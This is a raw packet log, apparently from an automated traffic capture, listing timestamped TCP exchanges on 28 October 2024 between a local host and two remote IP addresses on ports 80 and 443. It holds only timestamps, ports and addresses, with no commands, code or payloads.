                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.259139061 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.259149075 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.259183884 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.259213924 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.298090935 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.298199892 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.298254013 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.298264980 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.298296928 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.298329115 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.301975965 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.301986933 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.302030087 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.302071095 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.303540945 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.303551912 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.303606033 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.304006100 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.304017067 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.304073095 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.305473089 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.305484056 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.305529118 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.305782080 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.305793047 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.305838108 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.306525946 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.306536913 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.306580067 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.306828976 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.306839943 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.306849957 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.306876898 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.306907892 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.308746099 CET4434988513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.308820009 CET4434988513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.308871984 CET49885443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.309151888 CET49885443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.309163094 CET4434988513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.309175968 CET49885443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.309181929 CET4434988513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.309365988 CET4434988613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.309387922 CET4434988613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.309427977 CET4434988613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.309433937 CET49886443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.309458971 CET49886443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.310375929 CET49886443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.310389996 CET4434988613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.310401917 CET49886443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.310406923 CET4434988613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.313177109 CET49890443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.313255072 CET4434989013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.313458920 CET49890443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.313580036 CET49890443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.313611031 CET49891443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.313630104 CET4434989013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.313680887 CET4434989113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.313766003 CET49891443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.313911915 CET49891443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.313956022 CET4434989113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.381247044 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.381362915 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.381372929 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.381395102 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.381413937 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.381434917 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.382183075 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.382311106 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.382694960 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.382720947 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.382756948 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.382756948 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.383522034 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.383543015 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.383599043 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.384332895 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.384356022 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.384414911 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.423326015 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.423384905 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.423598051 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.423629999 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.423676014 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.424325943 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.424385071 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.425220013 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.425230980 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.425272942 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.425291061 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.425658941 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.425672054 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.425714970 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.431713104 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.431726933 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.431772947 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.431879997 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.431890965 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.431912899 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.431945086 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.432213068 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.432244062 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.432298899 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.432323933 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.434231997 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.434243917 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.434300900 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.434895039 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.434906960 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.434916973 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.434951067 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.434988022 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.435614109 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.435626030 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.435702085 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.505264044 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.505331993 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.505395889 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.505443096 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.505595922 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.505666018 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.506284952 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.506319046 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.506373882 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.507179022 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.507214069 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.507272959 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.508105993 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.508142948 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.508172989 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.508188963 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.508372068 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.508421898 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.544878960 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.544933081 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.544990063 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.548299074 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.548356056 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.549017906 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.549052954 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.549083948 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.549084902 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.549118042 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.549139977 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.549902916 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.549937963 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.549972057 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.549989939 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.552359104 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.552455902 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.552552938 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.552563906 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.552606106 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.553040981 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.553056002 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.553100109 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.553816080 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.553827047 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.553885937 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.554295063 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.554306030 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.554352999 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.555047989 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.555059910 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.555068970 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.555109978 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.555130005 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.555747032 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.555759907 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.555768967 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.555819988 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.555859089 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.556487083 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.556499004 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.556555033 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.557209015 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.557276011 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.628599882 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.628685951 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.628839970 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.628849983 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.628887892 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.629578114 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.629622936 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.629771948 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.629782915 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.629812002 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.629827976 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.630717993 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.630729914 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.630738974 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.630770922 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.630788088 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.631619930 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.631632090 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.631699085 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.670397997 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.670638084 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.670655012 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.670716047 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.670758963 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.671387911 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.671399117 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.671444893 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.676343918 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.676399946 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.676594973 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.676629066 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.676682949 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.677381039 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.677392006 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.677433014 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.678004980 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.678015947 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.678065062 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.678781033 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.678792953 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.678802013 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.678826094 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.678853989 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.679498911 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.679510117 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.679546118 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.680164099 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.680175066 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.680208921 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.680872917 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.680883884 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.680917978 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.681562901 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.681572914 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.681633949 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.722243071 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.722299099 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.723704100 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.723799944 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.753950119 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.754002094 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.754151106 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.754163980 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.754200935 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.754926920 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.754941940 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.754977942 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.755949020 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.755961895 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.756010056 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.756700039 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.756712914 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.756722927 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.756781101 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.756808043 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.784451008 CET4434988713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:38.785341024 CET49887443192.168.2.513.107.246.60
